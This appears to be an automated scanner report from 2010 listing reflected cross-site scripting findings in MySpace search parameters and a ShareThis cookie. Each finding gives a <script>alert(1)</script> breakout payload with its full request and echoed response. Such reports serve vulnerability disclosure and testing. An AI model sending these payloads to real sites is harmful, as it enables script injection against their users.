GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}35f7b"><script>alert(1)</script>d5606f113d5&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1 Host: searchservice.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}35f7b"><script>alert(1)</script>d5606f113d5&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85526"><script>alert(1)</script>df67b4d4c06 was submitted in the loc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}85526"><script>alert(1)</script>df67b4d4c06&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}85526"><script>alert(1)</script>df67b4d4c06&d={myspace:distance?}"> ...[SNIP]...
The value of the maxAge request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7a12"><script>alert(1)</script>8f03734cf6a was submitted in the maxAge parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}c7a12"><script>alert(1)</script>8f03734cf6a&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}c7a12"><script>alert(1)</script>8f03734cf6a&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the minAge request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a70"><script>alert(1)</script>4b34c3381c2 was submitted in the minAge parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}69a70"><script>alert(1)</script>4b34c3381c2&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}69a70"><script>alert(1)</script>4b34c3381c2&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
2.346. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://searchservice.myspace.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c94d"><script>alert(1)</script>2e19ff9bd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?2c94d"><script>alert(1)</script>2e19ff9bd0=1 HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?2c94d"><script>alert(1)</script>2e19ff9bd0=1">here</a>.</h2></body></html>
The value of the npic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 512a2"><script>alert(1)</script>c2b5ad80478 was submitted in the npic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}512a2"><script>alert(1)</script>c2b5ad80478&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}512a2"><script>alert(1)</script>c2b5ad80478&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the pg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26fd5"><script>alert(1)</script>b999b18a3c5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}26fd5"><script>alert(1)</script>b999b18a3c5&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}&pg={startPage?}26fd5"><script>alert(1)</script>b999b18a3c5&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the qry request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d575c"><script>alert(1)</script>62edbd18ab7 was submitted in the qry parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}d575c"><script>alert(1)</script>62edbd18ab7&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=People&qry={searchTerms}d575c"><script>alert(1)</script>62edbd18ab7&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6df9"><script>alert(1)</script>cedc8e5bf51 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.cfm?fuseaction=sitesearch.results&type=Peopleb6df9"><script>alert(1)</script>cedc8e5bf51&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?} HTTP/1.1
Host: searchservice.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.myspace.com/index.cfm?fuseaction=sitesearch.results&type=Peopleb6df9"><script>alert(1)</script>cedc8e5bf51&qry={searchTerms}&pg={startPage?}&g={myspace:gender?}&npic={myspace:hasPhoto?}&minAge={myspace:minAge?}&maxAge={myspace:maxAge?}&loc={myspace:location?}&d={myspace:distance?}"> ...[SNIP]...
The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 3c944<script>alert(1)</script>c8518326800 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /getSegment.php?rnd=1292087965340 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.myspace.com/search/people?q='&ac=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CtZmwEyzRb19rULmKqKUAg==3c944<script>alert(1)</script>c8518326800
Response
HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 11 Dec 2010 17:21:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Content-Length: 639
<html> <head><title>ShareThis Segmenter</title></head> <body> <script type="text/javascript"> var google_conversion_id = 1036609180; var google_conversion_language = "en"; var goo ...[SNIP]... <div style='display:none'>clicookie:CtZmwEyzRb19rULmKqKUAg==3c944<script>alert(1)</script>c8518326800 userid: </div> ...[SNIP]...
Report generated by XSS.CX at Sat Dec 11 15:13:56 CST 2010.